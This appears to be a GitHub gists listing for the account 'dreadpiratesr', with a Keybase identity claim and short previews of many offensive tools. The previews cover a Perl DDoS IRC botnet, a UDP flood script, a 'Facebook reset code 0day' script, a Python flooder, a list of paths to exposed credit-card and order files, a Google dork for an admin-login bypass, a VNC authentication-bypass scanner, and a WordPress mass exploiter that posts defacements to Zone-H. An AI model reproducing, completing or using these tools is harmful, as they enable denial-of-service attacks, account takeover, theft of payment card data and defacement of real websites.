I hereby claim:
- I am dreadpiratesr on github.
- I am dreadpiratesr (https://keybase.io/dreadpiratesr) on keybase.
- I have a public key whose fingerprint is 3A74 1C92 2992 DC81 5C77 0E45 5C83 1AF6 AE26 CC2C
To claim this, I am signing this object:
#!/usr/bin/perl | |
###################################################################################################################### | |
###################################################################################################################### | |
## DDoS Perl IrcBot v1.0 / 2015 by Orsineante Security Team ## [ Help ] ########################################### | |
## Stealth MultiFunctional IrcBot writen in Perl ####################################################### | |
## Teste on every system with PERL instlled ## !u @system ## | |
## ## !u @version ## | |
## This is a free program used on your own risk. ## !u @channel ## | |
## Created for educational purpose only. ## !u @flood ## |
[Save file as reckz.pl, Put it in Perl/Bin] | |
#!/usr/bin/perl START SCRIPT | |
use Socket; | |
use strict; | |
if ($#ARGV != 3) { | |
print "reckz.pl <ip> <port> <size> <time>\n\n"; | |
print " port=0: use random ports\n"; |
#Facebook Reset Code 0day Python Version | |
#If you want to edit this script you are free i don't give a fuck cause it tooks 2 minutes to write xD \!/ | |
#As a temporarily solution, use requesocks Module | |
#How to install? | |
#with pip : pip install requesocks | |
#with easy_install : easy_install requesocks | |
import urllib2 ,sys ,re | |
import os | |
import ssl |
I hereby claim:
To claim this, I am signing this object:
import socket | |
import random | |
import os, sys | |
import threading | |
if sys.platform == 'linux' or sys.platform == 'linux2': | |
clearing = ' clear' | |
else: | |
clearing = 'cls' | |
os.system(clearing) |
/cgi-bin/DCShop/Orders/orders.txt | |
/vpasp/shopdbtest.asp | |
/orders/checks.txt | |
/WebShop/logs | |
/ccbill/secure/ccbill.log /scripts/cart32.exe | |
/cvv2.txt | |
/cart/shopdbtest.asp | |
/cgi-win/cart.pl | |
/shopdbtest.asp | |
/WebShop/logs/cc.txt /cgi-local/cart.pl |
Exploit Title: Supercon Direct login to admin panel without entering password | |
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
Product Description | |
——————- | |
Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
We provide world-class technology services by constantly exploring and implementing innovative | |
solutions that drive long-term value to our customers. We have been providing solutions to clients | |
across the globe for more than 5 years and boast of our extensive | |
experience on website designing and development projects. |
#!/usr/bin/perl | |
# Scanner VNC - OpenVNC 4.11 authentication bypass By GhOsTrIaX | |
use strict; | |
use warnings; | |
use IO::Socket; | |
use threads; | |
use threads::shared; | |
use Errno qw(EAGAIN); |
#!/usr/bin/perl | |
use LWP::UserAgent; | |
use LWP::Simple; | |
use strict; | |
use warnings; | |
use threads; | |
use threads::shared; | |
use Config; | |
use HTML::TreeBuilder; |
#!/usr/bin/perl | |
# Themes Mass Exploiter Wordpress & Auto Post Zone-h | |
# Upload File and Submit your defacements on Zone-H | |
# TEAM : dreadpiratesr | |
# https://twitter.com/blackmarketi2p | |
# Author : dpr | |
# USAGE => perl bt.pl | |
use HTTP::Request; | |
use LWP::Simple; |